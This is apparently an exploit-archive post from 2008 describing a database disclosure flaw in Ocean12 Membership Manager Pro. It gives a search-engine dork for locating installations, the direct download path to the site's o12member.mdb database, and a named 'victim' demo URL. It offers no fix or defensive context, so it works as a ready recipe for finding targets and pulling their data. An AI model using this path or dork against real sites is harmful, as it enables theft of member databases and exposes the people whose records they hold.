id: 4271
date: 11/27/2008
title: Ocean12 Membership Manager Pro Database Disclosure Vulnerability
author: Pouya_Server
cves: 

================================================================
Ocean12 Membership Manager Pro Database Disclosure Vulnerability
================================================================


#########################################################
---------------------------------------------------------
Portal Name: Ocean12 Membership Manager Pro
Vendor : http://ocean12tech.com/products/membership
Dork: ©2005 Ocean12 Technologies. All rights reserved
Vulnerability : Database Disclosure Vulnerability
---------------------------------------------------------
#########################################################
http://ocean12tech.com/path/o12member.mdb
---------------------------------
Victem :
http://ocean12tech.com/products/membership/demo




#  0day.today [2023-03-22]  #